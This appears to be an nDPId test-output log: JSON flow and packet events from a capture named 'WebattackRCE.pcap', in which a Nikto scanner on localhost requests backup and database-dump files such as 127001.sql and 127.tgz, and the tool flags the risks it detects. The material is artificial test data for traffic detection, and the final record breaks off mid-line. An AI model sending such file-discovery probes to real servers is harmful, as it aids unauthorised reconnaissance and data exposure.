+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 